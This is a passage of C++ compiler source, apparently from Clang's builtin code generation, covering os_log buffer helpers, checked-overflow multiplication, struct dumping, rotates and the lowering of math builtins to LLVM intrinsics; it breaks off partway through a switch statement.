llvm::Function *CodeGenFunction::generateBuiltinOSLogHelperFunction(
const analyze_os_log::OSLogBufferLayout &Layout,
CharUnits BufferAlignment) {
ASTContext &Ctx = getContext();
llvm::SmallString<64> Name;
{
raw_svector_ostream OS(Name);
OS << "__os_log_helper";
OS << "_" << BufferAlignment.getQuantity();
OS << "_" << int(Layout.getSummaryByte());
OS << "_" << int(Layout.getNumArgsByte());
for (const auto &Item : Layout.Items)
OS << "_" << int(Item.getSizeByte()) << "_"
<< int(Item.getDescriptorByte());
}
if (llvm::Function *F = CGM.getModule().getFunction(Name))
return F;
llvm::SmallVector<QualType, 4> ArgTys;
FunctionArgList Args;
Args.push_back(ImplicitParamDecl::Create(
Ctx, nullptr, SourceLocation(), &Ctx.Idents.get("buffer"), Ctx.VoidPtrTy,
ImplicitParamDecl::Other));
ArgTys.emplace_back(Ctx.VoidPtrTy);
for (unsigned int I = 0, E = Layout.Items.size(); I < E; ++I) {
char Size = Layout.Items[I].getSizeByte();
if (!Size)
continue;
QualType ArgTy = getOSLogArgType(Ctx, Size);
Args.push_back(ImplicitParamDecl::Create(
Ctx, nullptr, SourceLocation(),
&Ctx.Idents.get(std::string("arg") + llvm::to_string(I)), ArgTy,
ImplicitParamDecl::Other));
ArgTys.emplace_back(ArgTy);
}
QualType ReturnTy = Ctx.VoidTy;
// The helper function has linkonce_odr linkage to enable the linker to merge
// identical functions. To ensure the merging always happens, 'noinline' is
// attached to the function when compiling with -Oz.
const CGFunctionInfo &FI =
CGM.getTypes().arrangeBuiltinFunctionDeclaration(ReturnTy, Args);
llvm::FunctionType *FuncTy = CGM.getTypes().GetFunctionType(FI);
llvm::Function *Fn = llvm::Function::Create(
FuncTy, llvm::GlobalValue::LinkOnceODRLinkage, Name, &CGM.getModule());
Fn->setVisibility(llvm::GlobalValue::HiddenVisibility);
CGM.SetLLVMFunctionAttributes(GlobalDecl(), FI, Fn, /*IsThunk=*/false);
CGM.SetLLVMFunctionAttributesForDefinition(nullptr, Fn);
Fn->setDoesNotThrow();
// Attach 'noinline' at -Oz.
if (CGM.getCodeGenOpts().OptimizeSize == 2)
Fn->addFnAttr(llvm::Attribute::NoInline);
auto NL = ApplyDebugLocation::CreateEmpty(*this);
StartFunction(GlobalDecl(), ReturnTy, Fn, FI, Args);
// Create a scope with an artificial location for the body of this function.
auto AL = ApplyDebugLocation::CreateArtificial(*this);
CharUnits Offset;
Address BufAddr(Builder.CreateLoad(GetAddrOfLocalVar(Args[0]), "buf"),
BufferAlignment);
Builder.CreateStore(Builder.getInt8(Layout.getSummaryByte()),
Builder.CreateConstByteGEP(BufAddr, Offset++, "summary"));
Builder.CreateStore(Builder.getInt8(Layout.getNumArgsByte()),
Builder.CreateConstByteGEP(BufAddr, Offset++, "numArgs"));
unsigned I = 1;
for (const auto &Item : Layout.Items) {
Builder.CreateStore(
Builder.getInt8(Item.getDescriptorByte()),
Builder.CreateConstByteGEP(BufAddr, Offset++, "argDescriptor"));
Builder.CreateStore(
Builder.getInt8(Item.getSizeByte()),
Builder.CreateConstByteGEP(BufAddr, Offset++, "argSize"));
CharUnits Size = Item.size();
if (!Size.getQuantity())
continue;
Address Arg = GetAddrOfLocalVar(Args[I]);
Address Addr = Builder.CreateConstByteGEP(BufAddr, Offset, "argData");
Addr = Builder.CreateBitCast(Addr, Arg.getPointer()->getType(),
"argDataCast");
Builder.CreateStore(Builder.CreateLoad(Arg), Addr);
Offset += Size;
++I;
}
FinishFunction();
return Fn;
}
RValue CodeGenFunction::emitBuiltinOSLogFormat(const CallExpr &E) {
assert(E.getNumArgs() >= 2 &&
"__builtin_os_log_format takes at least 2 arguments");
ASTContext &Ctx = getContext();
analyze_os_log::OSLogBufferLayout Layout;
analyze_os_log::computeOSLogBufferLayout(Ctx, &E, Layout);
Address BufAddr = EmitPointerWithAlignment(E.getArg(0));
llvm::SmallVector<llvm::Value *, 4> RetainableOperands;
// Ignore argument 1, the format string. It is not currently used.
CallArgList Args;
Args.add(RValue::get(BufAddr.getPointer()), Ctx.VoidPtrTy);
for (const auto &Item : Layout.Items) {
int Size = Item.getSizeByte();
if (!Size)
continue;
llvm::Value *ArgVal;
if (Item.getKind() == analyze_os_log::OSLogBufferItem::MaskKind) {
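      // Pack the mask type's bytes into a little-endian 64-bit integer
      // constant, one byte per character.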
uint64_t Val = 0;
for (unsigned I = 0, E = Item.getMaskType().size(); I < E; ++I)
Val |= ((uint64_t)Item.getMaskType()[I]) << I * 8;
ArgVal = llvm::Constant::getIntegerValue(Int64Ty, llvm::APInt(64, Val));
} else if (const Expr *TheExpr = Item.getExpr()) {
ArgVal = EmitScalarExpr(TheExpr, /*Ignore*/ false);
// If a temporary object that requires destruction after the full
// expression is passed, push a lifetime-extended cleanup to extend its
// lifetime to the end of the enclosing block scope.
auto LifetimeExtendObject = [&](const Expr *E) {
E = E->IgnoreParenCasts();
// Extend lifetimes of objects returned by function calls and message
// sends.
// FIXME: We should do this in other cases in which temporaries are
// created including arguments of non-ARC types (e.g., C++
// temporaries).
if (isa<CallExpr>(E) || isa<ObjCMessageExpr>(E))
return true;
return false;
};
if (TheExpr->getType()->isObjCRetainableType() &&
getLangOpts().ObjCAutoRefCount && LifetimeExtendObject(TheExpr)) {
assert(getEvaluationKind(TheExpr->getType()) == TEK_Scalar &&
"Only scalar can be a ObjC retainable type");
if (!isa<Constant>(ArgVal)) {
CleanupKind Cleanup = getARCCleanupKind();
QualType Ty = TheExpr->getType();
Address Alloca = Address::invalid();
Address Addr = CreateMemTemp(Ty, "os.log.arg", &Alloca);
ArgVal = EmitARCRetain(Ty, ArgVal);
Builder.CreateStore(ArgVal, Addr);
pushLifetimeExtendedDestroy(Cleanup, Alloca, Ty,
CodeGenFunction::destroyARCStrongPrecise,
Cleanup & EHCleanup);
        // Push a clang.arc.use call to ensure the ARC optimizer knows that
        // the argument has to be kept alive.
if (CGM.getCodeGenOpts().OptimizationLevel != 0)
pushCleanupAfterFullExpr<CallObjCArcUse>(Cleanup, ArgVal);
}
}
} else {
ArgVal = Builder.getInt32(Item.getConstValue().getQuantity());
}
unsigned ArgValSize =
CGM.getDataLayout().getTypeSizeInBits(ArgVal->getType());
llvm::IntegerType *IntTy = llvm::Type::getIntNTy(getLLVMContext(),
ArgValSize);
ArgVal = Builder.CreateBitOrPointerCast(ArgVal, IntTy);
CanQualType ArgTy = getOSLogArgType(Ctx, Size);
// If ArgVal has type x86_fp80, zero-extend ArgVal.
ArgVal = Builder.CreateZExtOrBitCast(ArgVal, ConvertType(ArgTy));
Args.add(RValue::get(ArgVal), ArgTy);
}
const CGFunctionInfo &FI =
CGM.getTypes().arrangeBuiltinFunctionCall(Ctx.VoidTy, Args);
llvm::Function *F = CodeGenFunction(CGM).generateBuiltinOSLogHelperFunction(
Layout, BufAddr.getAlignment());
EmitCall(FI, CGCallee::forDirect(F), ReturnValueSlot(), Args);
return RValue::get(BufAddr.getPointer());
}
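/// Determine if a binop is a checked unsigned multiply with a signed result
/// of the same width, which we can specialize below.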
static bool isSpecialUnsignedMultiplySignedResult(
unsigned BuiltinID, WidthAndSignedness Op1Info, WidthAndSignedness Op2Info,
WidthAndSignedness ResultInfo) {
return BuiltinID == Builtin::BI__builtin_mul_overflow &&
Op1Info.Width == Op2Info.Width && Op2Info.Width == ResultInfo.Width &&
!Op1Info.Signed && !Op2Info.Signed && ResultInfo.Signed;
}
static RValue EmitCheckedUnsignedMultiplySignedResult(
CodeGenFunction &CGF, const clang::Expr *Op1, WidthAndSignedness Op1Info,
const clang::Expr *Op2, WidthAndSignedness Op2Info,
const clang::Expr *ResultArg, QualType ResultQTy,
WidthAndSignedness ResultInfo) {
assert(isSpecialUnsignedMultiplySignedResult(
Builtin::BI__builtin_mul_overflow, Op1Info, Op2Info, ResultInfo) &&
"Cannot specialize this multiply");
llvm::Value *V1 = CGF.EmitScalarExpr(Op1);
llvm::Value *V2 = CGF.EmitScalarExpr(Op2);
llvm::Value *HasOverflow;
llvm::Value *Result = EmitOverflowIntrinsic(
CGF, llvm::Intrinsic::umul_with_overflow, V1, V2, HasOverflow);
  // The intrinsic call will detect overflow when the value is > UINT_MAX;
  // however, since the original builtin had a signed result, we need to report
  // an overflow when the result is greater than INT_MAX.
auto IntMax = llvm::APInt::getSignedMaxValue(ResultInfo.Width);
llvm::Value *IntMaxValue = llvm::ConstantInt::get(Result->getType(), IntMax);
llvm::Value *IntMaxOverflow = CGF.Builder.CreateICmpUGT(Result, IntMaxValue);
HasOverflow = CGF.Builder.CreateOr(HasOverflow, IntMaxOverflow);
bool isVolatile =
ResultArg->getType()->getPointeeType().isVolatileQualified();
Address ResultPtr = CGF.EmitPointerWithAlignment(ResultArg);
CGF.Builder.CreateStore(CGF.EmitToMemory(Result, ResultQTy), ResultPtr,
isVolatile);
return RValue::get(HasOverflow);
}
/// Determine if a binop is a checked mixed-sign multiply we can specialize.
static bool isSpecialMixedSignMultiply(unsigned BuiltinID,
WidthAndSignedness Op1Info,
WidthAndSignedness Op2Info,
WidthAndSignedness ResultInfo) {
return BuiltinID == Builtin::BI__builtin_mul_overflow &&
std::max(Op1Info.Width, Op2Info.Width) >= ResultInfo.Width &&
Op1Info.Signed != Op2Info.Signed;
}
/// Emit a checked mixed-sign multiply. This is a cheaper specialization of
/// the generic checked-binop irgen.
static RValue
EmitCheckedMixedSignMultiply(CodeGenFunction &CGF, const clang::Expr *Op1,
WidthAndSignedness Op1Info, const clang::Expr *Op2,
WidthAndSignedness Op2Info,
const clang::Expr *ResultArg, QualType ResultQTy,
WidthAndSignedness ResultInfo) {
assert(isSpecialMixedSignMultiply(Builtin::BI__builtin_mul_overflow, Op1Info,
Op2Info, ResultInfo) &&
"Not a mixed-sign multipliction we can specialize");
// Emit the signed and unsigned operands.
const clang::Expr *SignedOp = Op1Info.Signed ? Op1 : Op2;
const clang::Expr *UnsignedOp = Op1Info.Signed ? Op2 : Op1;
llvm::Value *Signed = CGF.EmitScalarExpr(SignedOp);
llvm::Value *Unsigned = CGF.EmitScalarExpr(UnsignedOp);
unsigned SignedOpWidth = Op1Info.Signed ? Op1Info.Width : Op2Info.Width;
unsigned UnsignedOpWidth = Op1Info.Signed ? Op2Info.Width : Op1Info.Width;
// One of the operands may be smaller than the other. If so, [s|z]ext it.
if (SignedOpWidth < UnsignedOpWidth)
Signed = CGF.Builder.CreateSExt(Signed, Unsigned->getType(), "op.sext");
if (UnsignedOpWidth < SignedOpWidth)
Unsigned = CGF.Builder.CreateZExt(Unsigned, Signed->getType(), "op.zext");
llvm::Type *OpTy = Signed->getType();
llvm::Value *Zero = llvm::Constant::getNullValue(OpTy);
Address ResultPtr = CGF.EmitPointerWithAlignment(ResultArg);
llvm::Type *ResTy = ResultPtr.getElementType();
unsigned OpWidth = std::max(Op1Info.Width, Op2Info.Width);
// Take the absolute value of the signed operand.
llvm::Value *IsNegative = CGF.Builder.CreateICmpSLT(Signed, Zero);
llvm::Value *AbsOfNegative = CGF.Builder.CreateSub(Zero, Signed);
llvm::Value *AbsSigned =
CGF.Builder.CreateSelect(IsNegative, AbsOfNegative, Signed);
// Perform a checked unsigned multiplication.
llvm::Value *UnsignedOverflow;
llvm::Value *UnsignedResult =
EmitOverflowIntrinsic(CGF, llvm::Intrinsic::umul_with_overflow, AbsSigned,
Unsigned, UnsignedOverflow);
llvm::Value *Overflow, *Result;
if (ResultInfo.Signed) {
    // Signed overflow occurs if the result is greater than INT_MAX or less
    // than INT_MIN, i.e. when |Result| > (INT_MAX + IsNegative).
auto IntMax =
llvm::APInt::getSignedMaxValue(ResultInfo.Width).zextOrSelf(OpWidth);
llvm::Value *MaxResult =
CGF.Builder.CreateAdd(llvm::ConstantInt::get(OpTy, IntMax),
CGF.Builder.CreateZExt(IsNegative, OpTy));
llvm::Value *SignedOverflow =
CGF.Builder.CreateICmpUGT(UnsignedResult, MaxResult);
Overflow = CGF.Builder.CreateOr(UnsignedOverflow, SignedOverflow);
// Prepare the signed result (possibly by negating it).
llvm::Value *NegativeResult = CGF.Builder.CreateNeg(UnsignedResult);
llvm::Value *SignedResult =
CGF.Builder.CreateSelect(IsNegative, NegativeResult, UnsignedResult);
Result = CGF.Builder.CreateTrunc(SignedResult, ResTy);
} else {
// Unsigned overflow occurs if the result is < 0 or greater than UINT_MAX.
llvm::Value *Underflow = CGF.Builder.CreateAnd(
IsNegative, CGF.Builder.CreateIsNotNull(UnsignedResult));
Overflow = CGF.Builder.CreateOr(UnsignedOverflow, Underflow);
if (ResultInfo.Width < OpWidth) {
auto IntMax =
llvm::APInt::getMaxValue(ResultInfo.Width).zext(OpWidth);
llvm::Value *TruncOverflow = CGF.Builder.CreateICmpUGT(
UnsignedResult, llvm::ConstantInt::get(OpTy, IntMax));
Overflow = CGF.Builder.CreateOr(Overflow, TruncOverflow);
}
// Negate the product if it would be negative in infinite precision.
Result = CGF.Builder.CreateSelect(
IsNegative, CGF.Builder.CreateNeg(UnsignedResult), UnsignedResult);
Result = CGF.Builder.CreateTrunc(Result, ResTy);
}
assert(Overflow && Result && "Missing overflow or result");
bool isVolatile =
ResultArg->getType()->getPointeeType().isVolatileQualified();
CGF.Builder.CreateStore(CGF.EmitToMemory(Result, ResultQTy), ResultPtr,
isVolatile);
return RValue::get(Overflow);
}
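// Recursively print the fields of the record type RType for
// __builtin_dump_struct: emit one printf-style call through Func per field
// and accumulate the summed return values.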
static llvm::Value *dumpRecord(CodeGenFunction &CGF, QualType RType,
Value *&RecordPtr, CharUnits Align,
llvm::FunctionCallee Func, int Lvl) {
ASTContext &Context = CGF.getContext();
RecordDecl *RD = RType->castAs<RecordType>()->getDecl()->getDefinition();
std::string Pad = std::string(Lvl * 4, ' ');
Value *GString =
CGF.Builder.CreateGlobalStringPtr(RType.getAsString() + " {\n");
Value *Res = CGF.Builder.CreateCall(Func, {GString});
static llvm::DenseMap<QualType, const char *> Types;
if (Types.empty()) {
Types[Context.CharTy] = "%c";
Types[Context.BoolTy] = "%d";
Types[Context.SignedCharTy] = "%hhd";
Types[Context.UnsignedCharTy] = "%hhu";
Types[Context.IntTy] = "%d";
Types[Context.UnsignedIntTy] = "%u";
Types[Context.LongTy] = "%ld";
Types[Context.UnsignedLongTy] = "%lu";
Types[Context.LongLongTy] = "%lld";
Types[Context.UnsignedLongLongTy] = "%llu";
Types[Context.ShortTy] = "%hd";
Types[Context.UnsignedShortTy] = "%hu";
Types[Context.VoidPtrTy] = "%p";
Types[Context.FloatTy] = "%f";
Types[Context.DoubleTy] = "%f";
Types[Context.LongDoubleTy] = "%Lf";
Types[Context.getPointerType(Context.CharTy)] = "%s";
Types[Context.getPointerType(Context.getConstType(Context.CharTy))] = "%s";
}
for (const auto *FD : RD->fields()) {
Value *FieldPtr = RecordPtr;
if (RD->isUnion())
FieldPtr = CGF.Builder.CreatePointerCast(
FieldPtr, CGF.ConvertType(Context.getPointerType(FD->getType())));
else
FieldPtr = CGF.Builder.CreateStructGEP(CGF.ConvertType(RType), FieldPtr,
FD->getFieldIndex());
GString = CGF.Builder.CreateGlobalStringPtr(
llvm::Twine(Pad)
.concat(FD->getType().getAsString())
.concat(llvm::Twine(' '))
.concat(FD->getNameAsString())
.concat(" : ")
.str());
Value *TmpRes = CGF.Builder.CreateCall(Func, {GString});
Res = CGF.Builder.CreateAdd(Res, TmpRes);
QualType CanonicalType =
FD->getType().getUnqualifiedType().getCanonicalType();
    // Recurse into nested record types and dump their fields as well.
if (CanonicalType->isRecordType()) {
TmpRes = dumpRecord(CGF, CanonicalType, FieldPtr, Align, Func, Lvl + 1);
Res = CGF.Builder.CreateAdd(TmpRes, Res);
continue;
}
    // Pick the best printf-style format for the current field, falling back
    // to "%p" for types not in the table.
llvm::Twine Format = Types.find(CanonicalType) == Types.end()
? Types[Context.VoidPtrTy]
: Types[CanonicalType];
Address FieldAddress = Address(FieldPtr, Align);
FieldPtr = CGF.Builder.CreateLoad(FieldAddress);
    // FIXME: Need to handle bitfields here.
GString = CGF.Builder.CreateGlobalStringPtr(
Format.concat(llvm::Twine('\n')).str());
TmpRes = CGF.Builder.CreateCall(Func, {GString, FieldPtr});
Res = CGF.Builder.CreateAdd(Res, TmpRes);
}
GString = CGF.Builder.CreateGlobalStringPtr(Pad + "}\n");
Value *TmpRes = CGF.Builder.CreateCall(Func, {GString});
Res = CGF.Builder.CreateAdd(Res, TmpRes);
return Res;
}
static bool
TypeRequiresBuiltinLaunderImp(const ASTContext &Ctx, QualType Ty,
llvm::SmallPtrSetImpl<const Decl *> &Seen) {
if (const auto *Arr = Ctx.getAsArrayType(Ty))
Ty = Ctx.getBaseElementType(Arr);
const auto *Record = Ty->getAsCXXRecordDecl();
if (!Record)
return false;
// We've already checked this type, or are in the process of checking it.
if (!Seen.insert(Record).second)
return false;
assert(Record->hasDefinition() &&
"Incomplete types should already be diagnosed");
if (Record->isDynamicClass())
return true;
for (FieldDecl *F : Record->fields()) {
if (TypeRequiresBuiltinLaunderImp(Ctx, F->getType(), Seen))
return true;
}
return false;
}
/// Determine if the specified type requires laundering by checking if it is a
/// dynamic class type or contains a subobject which is a dynamic class type.
static bool TypeRequiresBuiltinLaunder(CodeGenModule &CGM, QualType Ty) {
if (!CGM.getCodeGenOpts().StrictVTablePointers)
return false;
llvm::SmallPtrSet<const Decl *, 16> Seen;
return TypeRequiresBuiltinLaunderImp(CGM.getContext(), Ty, Seen);
}
RValue CodeGenFunction::emitRotate(const CallExpr *E, bool IsRotateRight) {
llvm::Value *Src = EmitScalarExpr(E->getArg(0));
llvm::Value *ShiftAmt = EmitScalarExpr(E->getArg(1));
// The builtin's shift arg may have a different type than the source arg and
// result, but the LLVM intrinsic uses the same type for all values.
llvm::Type *Ty = Src->getType();
ShiftAmt = Builder.CreateIntCast(ShiftAmt, Ty, false);
  // Rotate is a special case of LLVM funnel shift: the first two args are the
  // same.
unsigned IID = IsRotateRight ? Intrinsic::fshr : Intrinsic::fshl;
Function *F = CGM.getIntrinsic(IID, Ty);
return RValue::get(Builder.CreateCall(F, { Src, Src, ShiftAmt }));
}
// Map math builtins for long-double to f128 version.
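// For example, with IEEE-quad long double, __builtin_sqrtl is rewritten to
// __builtin_sqrtf128 so that it lowers to the f128 libcall.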
static unsigned mutateLongDoubleBuiltin(unsigned BuiltinID) {
switch (BuiltinID) {
#define MUTATE_LDBL(func) \
case Builtin::BI__builtin_##func##l: \
return Builtin::BI__builtin_##func##f128;
MUTATE_LDBL(sqrt)
MUTATE_LDBL(cbrt)
MUTATE_LDBL(fabs)
MUTATE_LDBL(log)
MUTATE_LDBL(log2)
MUTATE_LDBL(log10)
MUTATE_LDBL(log1p)
MUTATE_LDBL(logb)
MUTATE_LDBL(exp)
MUTATE_LDBL(exp2)
MUTATE_LDBL(expm1)
MUTATE_LDBL(fdim)
MUTATE_LDBL(hypot)
MUTATE_LDBL(ilogb)
MUTATE_LDBL(pow)
MUTATE_LDBL(fmin)
MUTATE_LDBL(fmax)
MUTATE_LDBL(ceil)
MUTATE_LDBL(trunc)
MUTATE_LDBL(rint)
MUTATE_LDBL(nearbyint)
MUTATE_LDBL(round)
MUTATE_LDBL(floor)
MUTATE_LDBL(lround)
MUTATE_LDBL(llround)
MUTATE_LDBL(lrint)
MUTATE_LDBL(llrint)
MUTATE_LDBL(fmod)
MUTATE_LDBL(modf)
MUTATE_LDBL(nan)
MUTATE_LDBL(nans)
MUTATE_LDBL(inf)
MUTATE_LDBL(fma)
MUTATE_LDBL(sin)
MUTATE_LDBL(cos)
MUTATE_LDBL(tan)
MUTATE_LDBL(sinh)
MUTATE_LDBL(cosh)
MUTATE_LDBL(tanh)
MUTATE_LDBL(asin)
MUTATE_LDBL(acos)
MUTATE_LDBL(atan)
MUTATE_LDBL(asinh)
MUTATE_LDBL(acosh)
MUTATE_LDBL(atanh)
MUTATE_LDBL(atan2)
MUTATE_LDBL(erf)
MUTATE_LDBL(erfc)
MUTATE_LDBL(ldexp)
MUTATE_LDBL(frexp)
MUTATE_LDBL(huge_val)
MUTATE_LDBL(copysign)
MUTATE_LDBL(nextafter)
MUTATE_LDBL(nexttoward)
MUTATE_LDBL(remainder)
MUTATE_LDBL(remquo)
MUTATE_LDBL(scalbln)
MUTATE_LDBL(scalbn)
MUTATE_LDBL(tgamma)
MUTATE_LDBL(lgamma)
#undef MUTATE_LDBL
default:
return BuiltinID;
}
}
RValue CodeGenFunction::EmitBuiltinExpr(const GlobalDecl GD, unsigned BuiltinID,
const CallExpr *E,
ReturnValueSlot ReturnValue) {
const FunctionDecl *FD = GD.getDecl()->getAsFunction();
// See if we can constant fold this builtin. If so, don't emit it at all.
Expr::EvalResult Result;
if (E->EvaluateAsRValue(Result, CGM.getContext()) &&
!Result.hasSideEffects()) {
if (Result.Val.isInt())
return RValue::get(llvm::ConstantInt::get(getLLVMContext(),
Result.Val.getInt()));
if (Result.Val.isFloat())
return RValue::get(llvm::ConstantFP::get(getLLVMContext(),
Result.Val.getFloat()));
}
  // If the current long-double semantics are IEEE 128-bit, replace math
  // builtins of long-double with their f128 equivalents.
  // TODO: This mutation should also be applied to targets other than PPC,
  // once the backend supports IEEE 128-bit style libcalls.
if (getTarget().getTriple().isPPC64() &&
&getTarget().getLongDoubleFormat() == &llvm::APFloat::IEEEquad())
BuiltinID = mutateLongDoubleBuiltin(BuiltinID);
// If the builtin has been declared explicitly with an assembler label,
// disable the specialized emitting below. Ideally we should communicate the
// rename in IR, or at least avoid generating the intrinsic calls that are
// likely to get lowered to the renamed library functions.
const unsigned BuiltinIDIfNoAsmLabel =
FD->hasAttr<AsmLabelAttr>() ? 0 : BuiltinID;
  // There are LLVM math intrinsics/instructions corresponding to math library
  // functions, except that the LLVM op never sets errno while the math library
  // might. Math builtins otherwise have the same semantics as their math
  // library twins. Thus, we can transform math library and builtin calls to
  // their LLVM counterparts if the call is marked 'const' (known to never set
  // errno).
if (FD->hasAttr<ConstAttr>()) {
switch (BuiltinIDIfNoAsmLabel) {
case Builtin::BIceil:
case Builtin::BIceilf:
case Builtin::BIceill:
case Builtin::BI__builtin_ceil:
case Builtin::BI__builtin_ceilf:
case Builtin::BI__builtin_ceilf16:
case Builtin::BI__builtin_ceill:
case Builtin::BI__builtin_ceilf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::ceil,
Intrinsic::experimental_constrained_ceil));
case Builtin::BIcopysign:
case Builtin::BIcopysignf:
case Builtin::BIcopysignl:
case Builtin::BI__builtin_copysign:
case Builtin::BI__builtin_copysignf:
case Builtin::BI__builtin_copysignf16:
case Builtin::BI__builtin_copysignl:
case Builtin::BI__builtin_copysignf128:
return RValue::get(emitBinaryBuiltin(*this, E, Intrinsic::copysign));
case Builtin::BIcos:
case Builtin::BIcosf:
case Builtin::BIcosl:
case Builtin::BI__builtin_cos:
case Builtin::BI__builtin_cosf:
case Builtin::BI__builtin_cosf16:
case Builtin::BI__builtin_cosl:
case Builtin::BI__builtin_cosf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::cos,
Intrinsic::experimental_constrained_cos));
case Builtin::BIexp:
case Builtin::BIexpf:
case Builtin::BIexpl:
case Builtin::BI__builtin_exp:
case Builtin::BI__builtin_expf:
case Builtin::BI__builtin_expf16:
case Builtin::BI__builtin_expl:
case Builtin::BI__builtin_expf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::exp,
Intrinsic::experimental_constrained_exp));
case Builtin::BIexp2:
case Builtin::BIexp2f:
case Builtin::BIexp2l:
case Builtin::BI__builtin_exp2:
case Builtin::BI__builtin_exp2f:
case Builtin::BI__builtin_exp2f16:
case Builtin::BI__builtin_exp2l:
case Builtin::BI__builtin_exp2f128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::exp2,
Intrinsic::experimental_constrained_exp2));
case Builtin::BIfabs:
case Builtin::BIfabsf:
case Builtin::BIfabsl:
case Builtin::BI__builtin_fabs:
case Builtin::BI__builtin_fabsf:
case Builtin::BI__builtin_fabsf16:
case Builtin::BI__builtin_fabsl:
case Builtin::BI__builtin_fabsf128:
return RValue::get(emitUnaryBuiltin(*this, E, Intrinsic::fabs));
case Builtin::BIfloor:
case Builtin::BIfloorf:
case Builtin::BIfloorl:
case Builtin::BI__builtin_floor:
case Builtin::BI__builtin_floorf:
case Builtin::BI__builtin_floorf16:
case Builtin::BI__builtin_floorl:
case Builtin::BI__builtin_floorf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::floor,
Intrinsic::experimental_constrained_floor));
case Builtin::BIfma:
case Builtin::BIfmaf:
case Builtin::BIfmal:
case Builtin::BI__builtin_fma:
case Builtin::BI__builtin_fmaf:
case Builtin::BI__builtin_fmaf16:
case Builtin::BI__builtin_fmal:
case Builtin::BI__builtin_fmaf128:
return RValue::get(emitTernaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::fma,
Intrinsic::experimental_constrained_fma));
case Builtin::BIfmax:
case Builtin::BIfmaxf:
case Builtin::BIfmaxl:
case Builtin::BI__builtin_fmax:
case Builtin::BI__builtin_fmaxf:
case Builtin::BI__builtin_fmaxf16:
case Builtin::BI__builtin_fmaxl:
case Builtin::BI__builtin_fmaxf128:
return RValue::get(emitBinaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::maxnum,
Intrinsic::experimental_constrained_maxnum));
case Builtin::BIfmin:
case Builtin::BIfminf:
case Builtin::BIfminl:
case Builtin::BI__builtin_fmin:
case Builtin::BI__builtin_fminf:
case Builtin::BI__builtin_fminf16:
case Builtin::BI__builtin_fminl:
case Builtin::BI__builtin_fminf128:
return RValue::get(emitBinaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::minnum,
Intrinsic::experimental_constrained_minnum));
    // fmod() is a special case: it maps to the frem instruction rather than an
    // LLVM intrinsic.
case Builtin::BIfmod:
case Builtin::BIfmodf:
case Builtin::BIfmodl:
case Builtin::BI__builtin_fmod:
case Builtin::BI__builtin_fmodf:
case Builtin::BI__builtin_fmodf16:
case Builtin::BI__builtin_fmodl:
case Builtin::BI__builtin_fmodf128: {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
Value *Arg1 = EmitScalarExpr(E->getArg(0));
Value *Arg2 = EmitScalarExpr(E->getArg(1));
return RValue::get(Builder.CreateFRem(Arg1, Arg2, "fmod"));
}
case Builtin::BIlog:
case Builtin::BIlogf:
case Builtin::BIlogl:
case Builtin::BI__builtin_log:
case Builtin::BI__builtin_logf:
case Builtin::BI__builtin_logf16:
case Builtin::BI__builtin_logl:
case Builtin::BI__builtin_logf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::log,
Intrinsic::experimental_constrained_log));
case Builtin::BIlog10:
case Builtin::BIlog10f:
case Builtin::BIlog10l:
case Builtin::BI__builtin_log10:
case Builtin::BI__builtin_log10f:
case Builtin::BI__builtin_log10f16:
case Builtin::BI__builtin_log10l:
case Builtin::BI__builtin_log10f128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::log10,
Intrinsic::experimental_constrained_log10));
case Builtin::BIlog2:
case Builtin::BIlog2f:
case Builtin::BIlog2l:
case Builtin::BI__builtin_log2:
case Builtin::BI__builtin_log2f:
case Builtin::BI__builtin_log2f16:
case Builtin::BI__builtin_log2l:
case Builtin::BI__builtin_log2f128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::log2,
Intrinsic::experimental_constrained_log2));
case Builtin::BInearbyint:
case Builtin::BInearbyintf:
case Builtin::BInearbyintl:
case Builtin::BI__builtin_nearbyint:
case Builtin::BI__builtin_nearbyintf:
case Builtin::BI__builtin_nearbyintl:
case Builtin::BI__builtin_nearbyintf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::nearbyint,
Intrinsic::experimental_constrained_nearbyint));
case Builtin::BIpow:
case Builtin::BIpowf:
case Builtin::BIpowl:
case Builtin::BI__builtin_pow:
case Builtin::BI__builtin_powf:
case Builtin::BI__builtin_powf16:
case Builtin::BI__builtin_powl:
case Builtin::BI__builtin_powf128:
return RValue::get(emitBinaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::pow,
Intrinsic::experimental_constrained_pow));
case Builtin::BIrint:
case Builtin::BIrintf:
case Builtin::BIrintl:
case Builtin::BI__builtin_rint:
case Builtin::BI__builtin_rintf:
case Builtin::BI__builtin_rintf16:
case Builtin::BI__builtin_rintl:
case Builtin::BI__builtin_rintf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::rint,
Intrinsic::experimental_constrained_rint));
case Builtin::BIround:
case Builtin::BIroundf:
case Builtin::BIroundl:
case Builtin::BI__builtin_round:
case Builtin::BI__builtin_roundf:
case Builtin::BI__builtin_roundf16:
case Builtin::BI__builtin_roundl:
case Builtin::BI__builtin_roundf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::round,
Intrinsic::experimental_constrained_round));
case Builtin::BIsin:
case Builtin::BIsinf:
case Builtin::BIsinl:
case Builtin::BI__builtin_sin:
case Builtin::BI__builtin_sinf:
case Builtin::BI__builtin_sinf16:
case Builtin::BI__builtin_sinl:
case Builtin::BI__builtin_sinf128:
return RValue::get(emitUnaryMaybeConstrainedFPBuiltin(*this, E,
Intrinsic::sin,
Intrinsic::experimental_constrained_sin));
case Builtin::BIsqrt:
case Builtin::BIsqrtf:
case Builtin::BIsqrtl:
case Builtin::BI__builtin_sqrt:
case Builtin::BI__builtin_sqrtf:
case Builtin::BI__builtin_sqrtf16:
case Builtin::BI__builtin_sqrtl:
